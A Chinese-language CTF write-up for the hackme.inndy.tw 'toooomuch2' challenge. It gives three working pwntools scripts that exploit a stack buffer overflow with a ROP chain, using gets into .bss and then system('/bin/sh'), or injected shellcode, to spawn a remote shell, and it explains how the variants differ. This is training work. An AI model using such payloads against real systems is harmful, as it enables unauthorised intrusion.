hackme pwn toomuch2 [buffer overflow + ROPx86]

checksec一下,发现啥保护也没有,不需要再找libc的版本了

这里的漏洞点在toomuch1中说过了

在toooomuch函数中,覆盖0x18+4个值,即可达到溢出效果

下一步目标是:将"/bin/sh"写入bss段中,然后执行system函数即可

类似x64平台,在x86中也有相似的通用gadgets

exp1:

利用gets+system:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))

pr = 0x804889B
system_plt = 0x080484C0
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system_plt) + p32(pr) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()

exp2:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))

pr = 0x804889B
system = 0x8048649
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()

分析一下:

exp1和exp2的不同点:exp1中,调用的是system_plt,没有pop—ret指令,即没有返回地址,所以要自己构造

exp2中,调用的是函数中的对system的调用,之后有pop和retn,即有恢复堆栈

单步调试即可看到区别

 

exp3:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

elf = ELF("./toooomuch")

io = remote("hackme.inndy.tw", 7702)
gets = elf.symbols['gets']
bss = elf.bss()
log.info("gets addr = " + str(hex(gets)))
log.info("bss addr = " + str(hex(bss)))

payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(bss) + p32(bss)
io.recvuntil("passcode: ")
io.sendline(payload)
io.sendline(asm(shellcraft.sh()))
io.interactive()

全部评论

相关推荐

牛客51274894...:照片认真的吗,找个专门拍证件照的几十块钱整端正点吧,要不就别加照片
点赞 评论 收藏
分享
评论
点赞
收藏
分享

创作者周榜

更多
正在热议
更多
# 春招至今,你的战绩如何? #
10009次浏览 92人参与
# 你的实习产出是真实的还是包装的? #
1793次浏览 41人参与
# MiniMax求职进展汇总 #
23902次浏览 308人参与
# 军工所铁饭碗 vs 互联网高薪资,你会选谁 #
7499次浏览 43人参与
# 简历第一个项目做什么 #
31600次浏览 332人参与
# 重来一次,我还会选择这个专业吗 #
433408次浏览 3926人参与
# 米连集团26产品管培生项目 #
5810次浏览 214人参与
# 当下环境,你会继续卷互联网,还是看其他行业机会 #
187032次浏览 1122人参与
# 牛客AI文生图 #
21414次浏览 238人参与
# 不考虑薪资和职业,你最想做什么工作呢? #
152312次浏览 887人参与
# 研究所笔面经互助 #
118885次浏览 577人参与
# 简历中的项目经历要怎么写? #
310134次浏览 4199人参与
# AI时代,哪些岗位最容易被淘汰 #
63508次浏览 807人参与
# 面试紧张时你会有什么表现? #
30492次浏览 188人参与
# 你今年的平均薪资是多少? #
213040次浏览 1039人参与
# 你怎么看待AI面试 #
179929次浏览 1238人参与
# 高学历就一定能找到好工作吗? #
64317次浏览 620人参与
# 你最满意的offer薪资是哪家公司? #
76454次浏览 374人参与
# 我的求职精神状态 #
448010次浏览 3129人参与
# 正在春招的你,也参与了去年秋招吗? #
363300次浏览 2637人参与
# 腾讯音乐求职进展汇总 #
160604次浏览 1111人参与
# 校招笔试 #
470629次浏览 2964人参与
牛客网
牛客网在线编程
牛客网题解
牛客企业服务